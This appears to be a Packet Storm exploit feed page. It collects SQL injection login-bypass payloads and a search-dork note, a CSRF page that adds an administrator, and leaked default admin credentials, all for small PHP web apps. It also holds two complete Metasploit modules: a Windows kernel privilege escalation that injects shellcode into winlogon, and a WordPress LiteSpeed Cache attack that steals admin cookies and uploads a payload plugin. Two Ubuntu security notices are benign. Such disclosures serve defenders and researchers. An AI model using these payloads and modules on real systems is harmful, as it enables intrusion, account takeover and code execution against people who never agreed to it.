Nipah Virus Testing Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Nipah virus (NiV) – Testing Management System 1.0 Auth By Pass Vulnerability                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/nipah-virus-niv-testing-management-system-using-php-and-mysql/                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : USer & PASs : ' or 0=0 ##[+] http://127.0.0.1/nipah-tms/dashboard.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Nipah Virus Testing Management System 1.0 SQL Injection

Ubuntu Security Notice 7017-1 - Iggy Frankovic discovered that Quagga incorrectly handled certain BGP messages. A remote attacker could possibly use this issue to cause Quagga to crash, resulting in a denial of service.

    ==========================================================================Ubuntu Security Notice USN-7017-1September 17, 2024quagga vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Quagga could be made to crash if it received specially crafted networktraffic.Software Description:- quagga: BGP/OSPF/RIP routing daemonDetails:Iggy Frankovic discovered that Quagga incorrectly handled certain BGPmessages. A remote attacker could possibly use this issue to cause Quaggato crash, resulting in a denial of service.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS   quagga                          1.2.4-4ubuntu0.5   quagga-bgpd                     1.2.4-4ubuntu0.5In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-7017-1   CVE-2024-44070Package Information:   https://launchpad.net/ubuntu/+source/quagga/1.2.4-4ubuntu0.5

Ubuntu Security Notice USN-7017-1

Ubuntu Security Notice 7016-1 - Iggy Frankovic discovered that FRR incorrectly handled certain BGP messages. A remote attacker could possibly use this issue to cause FRR to crash, resulting in a denial of service.

    ==========================================================================Ubuntu Security Notice USN-7016-1September 17, 2024frr vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 24.04 LTS- Ubuntu 22.04 LTSSummary:FRR could be made to crash if it received specially crafted networktraffic.Software Description:- frr: FRRouting suite of internet protocolsDetails:Iggy Frankovic discovered that FRR incorrectly handled certain BGPmessages. A remote attacker could possibly use this issue to cause FRR tocrash, resulting in a denial of service.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 24.04 LTS   frr                             8.4.4-1.1ubuntu6.2Ubuntu 22.04 LTS   frr                             8.1-1ubuntu1.11In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-7016-1   CVE-2024-44070Package Information:   https://launchpad.net/ubuntu/+source/frr/8.4.4-1.1ubuntu6.2   https://launchpad.net/ubuntu/+source/frr/8.1-1ubuntu1.11

Ubuntu Security Notice USN-7016-1

Membership Management System version 1.1 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Membership Management System 1.1 Auth By Pass Vulnerability                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://codeastro.com/membership-management-system-in-php-with-source-code/                                        |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : USer = ' or 0=0 ## & PASs : ' or 0=0 ##[+] http://127.0.0.1/Membership/dashboard.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Membership Management System 1.1 SQL Injection

HYSCALE System version 1.9 suffers from add administrator and cross site request forgery vulnerabilities.

=============================================================================================================================================  
| # Title     : HYSCALE System v1.9 CSRF add admin Vulnerability                                                                            |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.kashipara.com/project/download/project2/user/2024/202402/kashipara.com_hyscaler19-zip.zip                       |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This HTML page is designed to remotely add new admin.

[+] Line 10 : Set your target url

[+] save payload as poc.html 

[+] payload : 

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>Registration Form</title>  
</head>  
<body>

<form action="http://127.0.0.1/HYSCALER19/registration_submit.php" method="POST">

        <label for="username">Username:</label>  
    <input type="text" name="username" id="username" required><br><br>

    <label for="email">Email:</label>  
    <input type="email" name="email" id="email" required><br><br>

    <label for="password">Password:</label>  
    <input type="password" name="password" id="password" required><br><br>

    <label for="dob">Date of Birth:</label>  
    <input type="text" name="dob" id="dob" placeholder="YYYY-MM-DD" required><br><br>

    <label>Gender:</label><br>  
    <input type="radio" name="gender" value="Male" id="male" required>  
    <label for="male">Male</label><br>  
    <input type="radio" name="gender" value="Female" id="female">  
    <label for="female">Female</label><br><br>

    <label for="usertype">User Type:</label>  
    <select name="usertype" id="usertype" required>  
        <option value="admin">Admin</option>  
        <option value="user">User</option>  
        <option value="guest">Guest</option>  
    </select><br><br>

    <label for="target_sales">Target Sales:</label>  
    <input type="text" name="target_sales" id="target_sales" required><br><br>

    <input type="submit" value="Submit">

</form>

</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

HYSCALE System 1.9 Add Administrator / Cross Site Request Forgery

Furniture Master version 2 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : Furniture master v2 Sql injection Vulnerability                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://www.kashipara.com/project/download/project2/user/2024/202404/kashipara.com_furniture-master-2-zip.zip      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /prodInfo.php?prodId=1 <===== inject here[+] http://127.0.0.1/furniture_master/prodInfo.php?prodId=1Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Furniture Master 2 SQL Injection

Food Ordering and Table Reservation System for Restaurants version 1.0 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : food ordering and table reservation system for restaurants 1.0 Insecure Settings Vulnerability                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://www.kashipara.com/project/download/project2/user/2024/202404/kashipara.com_food-ordering-and-table-re.zip  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload :     Username: murja      Password: 123[+] http://127.0.0.1/food-ordering-and-table-reservation-system-for-restaurants-master/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Food Ordering And Table Reservation System For Restaurants 1.0 Insecure Settings

Beauty Parlour and Saloon Management System version 1.1 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : Beauty Parlour & Saloon Management System 1.1 Insecure Settings Vulnerability                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/beauty-parlour-management-system-using-php-and-mysql/                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload :     Username: admin      Password: Test@123[+] http://127.0.0.1/bpmsp/admin/dashboard.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Beauty Parlour And Saloon Management System 1.1 Insecure Settings

CVE-2024-30088 is a Windows kernel elevation of privilege vulnerability which affects many recent versions of Windows 10, Windows 11 and Windows Server 2022. The vulnerability exists inside the function called AuthzBasepCopyoutInternalSecurityAttributes specifically when the kernel copies the _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION of the current token object to user mode. When the kernel performs the copy of the SecurityAttributesList, it sets up the list of the SecurityAttributes structure directly to the user supplied pointed. It then calls RtlCopyUnicodeString and AuthzBasepCopyoutInternalSecurityAttributeValues to copy out the names and values of the SecurityAttribute leading to multiple Time Of Check Time Of Use (TOCTOU) vulnerabilities in the function.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Local  Rank = ExcellentRanking  include Msf::Exploit::Local::WindowsKernel  include Msf::Post::File  include Msf::Post::Windows::Priv  include Msf::Post::Windows::Process  include Msf::Post::Windows::ReflectiveDLLInjection  include Msf::Post::Windows::Version  include Msf::Exploit::Retry  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Windows Kernel Time of Check Time of Use LPE in AuthzBasepCopyoutInternalSecurityAttributes',        'Description' => %q{          CVE-2024-30088 is a Windows Kernel Elevation of Privilege Vulnerability which affects many recent versions of Windows 10,          Windows 11 and Windows Server 2022.          The vulnerability exists inside the function called `AuthzBasepCopyoutInternalSecurityAttributes` specifically when          the kernel copies the `_AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION` of the current token object to user mode. When the          kernel preforms the copy of the `SecurityAttributesList`, it sets up the list of the SecurityAttribute's structure          directly to the user supplied pointed. It then calls `RtlCopyUnicodeString` and          `AuthzBasepCopyoutInternalSecurityAttributeValues` to copy out the names and values of the `SecurityAttribute` leading          to multiple Time Of Check Time Of Use (TOCTOU) vulnerabilities in the function.        },        'Author' => [          'tykawaii98', # PoC (Bùi Quang Hiếu)          'jheysel-r7' # msf module        ],        'References' => [          [ 'URL', 'https://github.com/tykawaii98/CVE-2024-30088'],          [ 'CVE', '2024-30038']        ],        'License' => MSF_LICENSE,        'Platform' => 'win',        'Privileged' => true,        'SessionTypes' => [ 'meterpreter' ],        'Arch' => [ ARCH_X64 ],        'Targets' => [          [ 'Windows x64', { 'Arch' => ARCH_X64 } ]        ],        'DisclosureDate' => '2024-06-11',        'Notes' => {          'Stability' => [ CRASH_SAFE, ],          'SideEffects' => [ ARTIFACTS_ON_DISK, ],          'Reliability' => [UNRELIABLE_SESSION] # It should return a session on the first run although has the potential to fail.        },                                      # After the first run the original session will usually die if the module is rerun against the same session.        'Compat' => {          'Meterpreter' => {            'Commands' => %w[              stdapi_sys_process_get_processes              stdapi_railgun_api              stdapi_sys_process_memory_allocate              stdapi_sys_process_memory_protect              stdapi_sys_process_memory_read              stdapi_sys_process_memory_write            ]          }        }      )     )  end  def target_compatible?(version)    # NOTE: Win10_1607 = Server2016 and Win10_1809 = Server2019. Both Server and Desktop version are supposed to be affected.    return true if version.build_number.between?(Msf::WindowsVersion::Win10_1507, Rex::Version.new('10.0.10240.20680')) ||                   version.build_number.between?(Msf::WindowsVersion::Win10_1607, Rex::Version.new('10.0.14393.7070')) ||                   version.build_number.between?(Msf::WindowsVersion::Win10_1809, Rex::Version.new('10.0.17763.5936')) ||                   version.build_number.between?(Msf::WindowsVersion::Win10_21H2, Rex::Version.new('10.0.19044.4529')) ||                   version.build_number.between?(Msf::WindowsVersion::Win10_22H2, Rex::Version.new('10.0.19045.4529')) ||                   version.build_number.between?(Msf::WindowsVersion::Win11_21H2, Rex::Version.new('10.0.22000.3019')) ||                   version.build_number.between?(Msf::WindowsVersion::Win11_22H2, Rex::Version.new('10.0.22621.3737')) ||                   version.build_number.between?(Msf::WindowsVersion::Win11_23H2, Rex::Version.new('10.0.22631.3737')) ||                   version.build_number.between?(Msf::WindowsVersion::Server2022, Rex::Version.new('10.0.20348.2522')) ||                   version.build_number.between?(Msf::WindowsVersion::Server2022_23H2, Rex::Version.new('10.0.25398.950'))    false  end  def check    return Exploit::CheckCode::Safe('Non Windows systems are not affected') unless session.platform == 'windows'    version = get_version_info    return Exploit::CheckCode::Appears("Version detected: #{version}") if target_compatible?(version)    CheckCode::Safe("Version detected: #{version}")  end  def get_winlogon_pid    processes = client.sys.process.get_processes    winlogon_pid = nil    processes.each do |process|      if process['name'].downcase == 'winlogon.exe'        winlogon_pid = process['pid']        break      end    end    winlogon_pid  end  def get_winlogon_handle    pid = session.sys.process.getpid    process_handle = session.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS)    address = process_handle.memory.allocate(8)    thread = execute_dll(      ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2024-30088', 'CVE-2024-30088.x64.dll'),      address,      pid    )    calls = [      ['kernel32', 'WaitForSingleObject', [ thread.handle, 20000 ] ],      ['kernel32', 'GetExitCodeThread', [ thread.handle, 4 ] ],    ]    results = session.railgun.multi(calls)    winlogon_handle = nil    if results.last['lpExitCode'] == 0      print_good('The exploit was successful, reading SYSTEM token from memory...')      current_memory = process_handle.memory.read(address, 8)      winlogon_handle = current_memory.unpack('Q<').first    end    session.railgun.kernel32.VirtualFree(address, 0, MEM_RELEASE)    winlogon_handle  end  def exploit    if is_system?      fail_with(Failure::None, 'Session is already elevated')    end    version = get_version_info    unless target_compatible?(version)      fail_with(Failure::NoTarget, "The exploit does not support this version of Windows: #{version}")    end    winlogon_handle = get_winlogon_handle    fail_with(Failure::UnexpectedReply, 'Unable to retrieve the winlogon handle') unless winlogon_handle    print_good("Successfully stole winlogon handle: #{winlogon_handle}")    winlogon_pid = get_winlogon_pid    fail_with(Failure::UnexpectedReply, 'Unable to retrieve the winlogon pid') unless winlogon_pid    print_good("Successfully retrieved winlogon pid: #{winlogon_pid}")    host = session.sys.process.new(winlogon_pid, winlogon_handle)    shellcode = payload.encoded    shell_addr = host.memory.allocate(shellcode.length)    host.memory.protect(shell_addr)    if host.memory.write(shell_addr, shellcode) < shellcode.length      fail_with(Failure::UnexpectedReply, 'Failed to write shellcode')    end    vprint_status("Creating the thread to execute in 0x#{shell_addr.to_s(16)} (pid=#{winlogon_pid})")    thread = host.thread.create(shell_addr, 0)    unless thread.instance_of?(Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Thread)      fail_with(Failure::UnexpectedReply, 'Unable to create thread')    end  endend

Microsoft Windows TOCTOU Local Privilege Escalation

This Metasploit module exploits an unauthenticated account takeover vulnerability in LiteSpeed Cache, a WordPress plugin that currently has around 6 million active installations. In LiteSpeed Cache versions prior to 6.5.0.1, when the Debug Logging feature is enabled, the plugin will log admin cookies to the /wp-content/debug.log endpoint which is accessible without authentication. The Debug Logging feature in the plugin is not enabled by default. The admin cookies found in the debug.log can be used to upload and execute a malicious plugin containing a payload.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::HTTP::Wordpress  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  class DebugLogError < StandardError; end  class WordPressNotOnline < StandardError; end  class AdminCookieError < StandardError; end  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Wordpress LiteSpeed Cache plugin cookie theft',        'Description' => %q{          This module exploits an unauthenticated account takeover vulnerability in LiteSpeed Cache, a Wordpress plugin          that currently has around 6 million active installations. In LiteSpeed Cache versions prior to 6.5.0.1, when          the Debug Logging feature is enabled, the plugin will log admin cookies to the /wp-content/debug.log endpoint          which is accessible without authentication. The Debug Logging feature in the plugin is not enabled by default.          The admin cookies found in the debug.log can be used to upload and execute a malicious plugin containing a payload.        },        'Author' => [          'Rafie Muhammad', # discovery          'jheysel-r7' # module        ],        'References' => [          [ 'URL', 'https://patchstack.com/articles/critical-account-takeover-vulnerability-patched-in-litespeed-cache-plugin/'],          [ 'CVE', '2024-44000']        ],        'License' => MSF_LICENSE,        'Privileged' => false,        'Platform' => ['unix', 'linux', 'win', 'php'],        'Arch' => [ARCH_PHP, ARCH_CMD],        'Targets' => [          [            'PHP In-Memory',            {              'Platform' => 'php',              'Arch' => ARCH_PHP              # tested with php/meterpreter/reverse_tcp            }          ],          [            'Unix In-Memory',            {              'Platform' => ['unix', 'linux'],              'Arch' => ARCH_CMD              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp            }          ],          [            'Windows In-Memory',            {              'Platform' => 'win',              'Arch' => ARCH_CMD            }          ],        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2024-09-04',        'Notes' => {          'Stability' => [ CRASH_SAFE, ],          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS],          'Reliability' => [ REPEATABLE_SESSION, ]        }      )    )  end  def check    @admin_cookie = get_valid_admin_cookie    CheckCode::Vulnerable('Found and tested valid admin cookie, we can upload and execute a payload')  rescue WordPressNotOnline => e    return CheckCode::Unknown("This doesn't appear to be a WordPress site: #{e.class}, #{e}")  rescue DebugLogError => e    return CheckCode::Safe("#{e.class}, #{e}")  rescue AdminCookieError => e    return CheckCode::Safe("#{e.class}, #{e}")  end  def extract_cookies(debug_log)    admin_cookies = []    debug_log.each_line do |log_line|      # 09/13/24 15:52:48.009 [192.168.65.1:58695 1 UNP] Cookie: wordpress_70490311fe7c84acda8886406a6d884b=admin%7C1726415372%7C8dXTtGUqH8cjixS1ZU8k58iBmfXRK0xMHXgDZwgjPfn%7C4084023e82a4c58d574ddf33142b168ff5cb93446675ca8116fd32e1de2b8df7; wordpress_logged_in_70490311fe7c84acda8886406a6d884b=admin%7C1726415372%7C8dXTtGUqH8cjixS1ZU8k58iBmfXRK0xMHXgDZwgjPfn%7Cf6bb4d0fdca7b147f320472893374a063b095b550db3488f86e58b6c47e4ce4c      match = log_line.match(/(wordpress(_logged_in)?_[a-f0-9]{32}=[^;]+)/)      admin_cookies << match.captures.compact.join('; ') if match    end    admin_cookies  end  def verify_admin_cookie(admin_cookies)    admin_cookies.each do |admin_cookie|      res = send_request_cgi({        'uri' => '/wp-admin/',        'cookie' => admin_cookie      })      return admin_cookie if res&.code == 200    end    nil  end  def get_valid_admin_cookie    raise WordPressNotOnline unless wordpress_and_online?    res = send_request_cgi({      'uri' => normalize_uri('wp-content', 'debug.log'),      'method' => 'GET'    })    raise DebugLogError, 'There was no /wp-content/debug.log endpoint found on the target to pillage' unless res&.code == 200    raise DebugLogError, 'There were no cookies found inside /wp-content/debug.log' unless res.body.include?('wordpress_logged_in')    admin_cookies = extract_cookies(res.body)    raise AdminCookieError, 'No admin cookies could be found in debug.log' if admin_cookies.blank?    print_status('One or more potential admin cookies were found')    admin_cookie = verify_admin_cookie(admin_cookies)    raise AdminCookieError, 'Admin cookies were found but are invalid' unless admin_cookie    admin_cookie  end  def exploit    unless @admin_cookie      begin        @admin_cookie = get_valid_admin_cookie        print_good('Found and tested valid admin cookie, we can upload and execute a payload')      rescue WordPressNotOnline => e        fail_with(Failure::NotFound, "#{e.class}, #{e}")      rescue DebugLogError, AdminCookieError => e        fail_with(Failure::UnexpectedReply, "#{e.class}, #{e}")      end    end    print_status('Preparing payload...')    plugin_name = Rex::Text.rand_text_alpha(10)    payload_name = Rex::Text.rand_text_alpha(10).to_s    payload_uri = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php")    zip = generate_plugin(plugin_name, payload_name)    print_status('Uploading payload...')    uploaded = wordpress_upload_plugin(plugin_name, zip.pack, @admin_cookie)    fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless uploaded    print_status("Executing the payload at #{payload_uri}...")    register_files_for_cleanup("#{payload_name}.php", "#{plugin_name}.php")    register_dir_for_cleanup("../#{plugin_name}")    send_request_cgi({ 'uri' => payload_uri, 'method' => 'GET' })  endend

Source

Packet Storm